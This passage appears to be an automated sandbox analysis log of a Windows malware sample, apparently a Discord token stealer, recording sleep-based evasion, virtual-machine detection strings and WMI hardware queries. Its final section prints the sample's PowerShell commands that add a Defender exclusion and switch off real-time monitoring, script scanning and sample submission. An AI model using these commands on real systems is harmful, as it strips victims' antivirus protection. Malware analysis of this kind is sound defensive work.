            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeMemory allocated: 1EBB50E0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeMemory allocated: 1EBCEA00000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeCode function: 0_2_00007FF887D28395 rdtsc 0_2_00007FF887D28395
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeThread delayed: delay time: 598515Jump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeThread delayed: delay time: 598406Jump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeThread delayed: delay time: 598297Jump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeThread delayed: delay time: 598188Jump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeThread delayed: delay time: 598074Jump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeThread delayed: delay time: 597963Jump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeThread delayed: delay time: 597859Jump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeThread delayed: delay time: 597750Jump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeThread delayed: delay time: 597641Jump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeThread delayed: delay time: 597531Jump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeThread delayed: delay time: 597422Jump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeThread delayed: delay time: 597312Jump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeThread delayed: delay time: 597203Jump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeThread delayed: delay time: 597084Jump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeThread delayed: delay time: 596969Jump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeThread delayed: delay time: 596859Jump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeThread delayed: delay time: 596750Jump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeThread delayed: delay time: 596641Jump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeThread delayed: delay time: 596531Jump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeThread delayed: delay time: 596414Jump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeThread delayed: delay time: 596270Jump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeThread delayed: delay time: 595828Jump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeThread delayed: delay time: 595656Jump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeThread delayed: delay time: 595545Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeWindow / User API: threadDelayed 3913Jump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeWindow / User API: threadDelayed 5854Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6455Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3306Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1148Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2252Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3689
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 883
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3496
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1046
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exe TID: 7576Thread sleep time: -19369081277395017s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exe TID: 7576Thread sleep time: -100000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exe TID: 7576Thread sleep time: -99891s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exe TID: 7576Thread sleep time: -99717s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exe TID: 7576Thread sleep time: -99610s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exe TID: 7576Thread sleep time: -99485s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exe TID: 7576Thread sleep time: -99360s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exe TID: 7576Thread sleep time: -99235s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exe TID: 7576Thread sleep time: -99110s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exe TID: 7576Thread sleep time: -98911s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exe TID: 7576Thread sleep time: -98795s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exe TID: 7576Thread sleep time: -98641s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exe TID: 7576Thread sleep time: -598515s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exe TID: 7576Thread sleep time: -598406s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exe TID: 7576Thread sleep time: -598297s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exe TID: 7576Thread sleep time: -598188s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exe TID: 7576Thread sleep time: -598074s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exe TID: 7576Thread sleep time: -597963s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exe TID: 7576Thread sleep time: -597859s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exe TID: 7576Thread sleep time: -597750s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exe TID: 7576Thread sleep time: -597641s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exe TID: 7576Thread sleep time: -597531s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exe TID: 7576Thread sleep time: -597422s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exe TID: 7576Thread sleep time: -597312s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exe TID: 7576Thread sleep time: -597203s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exe TID: 7576Thread sleep time: -597084s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exe TID: 7576Thread sleep time: -596969s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exe TID: 7576Thread sleep time: -596859s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exe TID: 7576Thread sleep time: -596750s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exe TID: 7576Thread sleep time: -596641s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exe TID: 7576Thread sleep time: -596531s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exe TID: 7576Thread sleep time: -596414s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exe TID: 7576Thread sleep time: -596270s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exe TID: 7576Thread sleep time: -595828s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exe TID: 7576Thread sleep time: -595656s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exe TID: 7576Thread sleep time: -595545s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7748Thread sleep count: 6455 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7748Thread sleep count: 3306 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7796Thread sleep time: -9223372036854770s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7992Thread sleep count: 1148 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7992Thread sleep count: 2252 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8008Thread sleep time: -1844674407370954s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3132Thread sleep count: 3689 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5112Thread sleep count: 883 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 352Thread sleep time: -2767011611056431s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3008Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6440Thread sleep count: 3496 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1876Thread sleep time: -4611686018427385s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6224Thread sleep count: 1046 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7684Thread sleep time: -1844674407370954s >= -30000s
            Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
            Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeThread delayed: delay time: 100000Jump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeThread delayed: delay time: 99891Jump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeThread delayed: delay time: 99717Jump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeThread delayed: delay time: 99610Jump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeThread delayed: delay time: 99485Jump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeThread delayed: delay time: 99360Jump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeThread delayed: delay time: 99235Jump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeThread delayed: delay time: 99110Jump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeThread delayed: delay time: 98911Jump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeThread delayed: delay time: 98795Jump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeThread delayed: delay time: 98641Jump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeThread delayed: delay time: 598515Jump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeThread delayed: delay time: 598406Jump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeThread delayed: delay time: 598297Jump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeThread delayed: delay time: 598188Jump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeThread delayed: delay time: 598074Jump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeThread delayed: delay time: 597963Jump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeThread delayed: delay time: 597859Jump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeThread delayed: delay time: 597750Jump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeThread delayed: delay time: 597641Jump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeThread delayed: delay time: 597531Jump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeThread delayed: delay time: 597422Jump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeThread delayed: delay time: 597312Jump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeThread delayed: delay time: 597203Jump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeThread delayed: delay time: 597084Jump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeThread delayed: delay time: 596969Jump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeThread delayed: delay time: 596859Jump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeThread delayed: delay time: 596750Jump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeThread delayed: delay time: 596641Jump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeThread delayed: delay time: 596531Jump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeThread delayed: delay time: 596414Jump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeThread delayed: delay time: 596270Jump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeThread delayed: delay time: 595828Jump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeThread delayed: delay time: 595656Jump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeThread delayed: delay time: 595545Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: https___files.catbox.moe_l2rczc.pif.exe, TqmmU.scr.0.drBinary or memory string: vboxtray
            Source: TqmmU.scr.0.drBinary or memory string: vboxservice
            Source: https___files.catbox.moe_l2rczc.pif.exe, TqmmU.scr.0.drBinary or memory string: qemu-ga
            Source: TqmmU.scr.0.drBinary or memory string: vmwareuser
            Source: https___files.catbox.moe_l2rczc.pif.exe, TqmmU.scr.0.drBinary or memory string: vmusrvc
            Source: TqmmU.scr.0.drBinary or memory string: vmwareservice+discordtokenprotector
            Source: TqmmU.scr.0.drBinary or memory string: vmsrvc
            Source: TqmmU.scr.0.drBinary or memory string: vmtoolsd
            Source: TqmmU.scr.0.drBinary or memory string: vmwaretray
            Source: https___files.catbox.moe_l2rczc.pif.exe, 00000000.00000002.1877878740.000001EBB4FE2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeCode function: 0_2_00007FF887D28395 rdtsc 0_2_00007FF887D28395
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exe'
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exe'Jump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
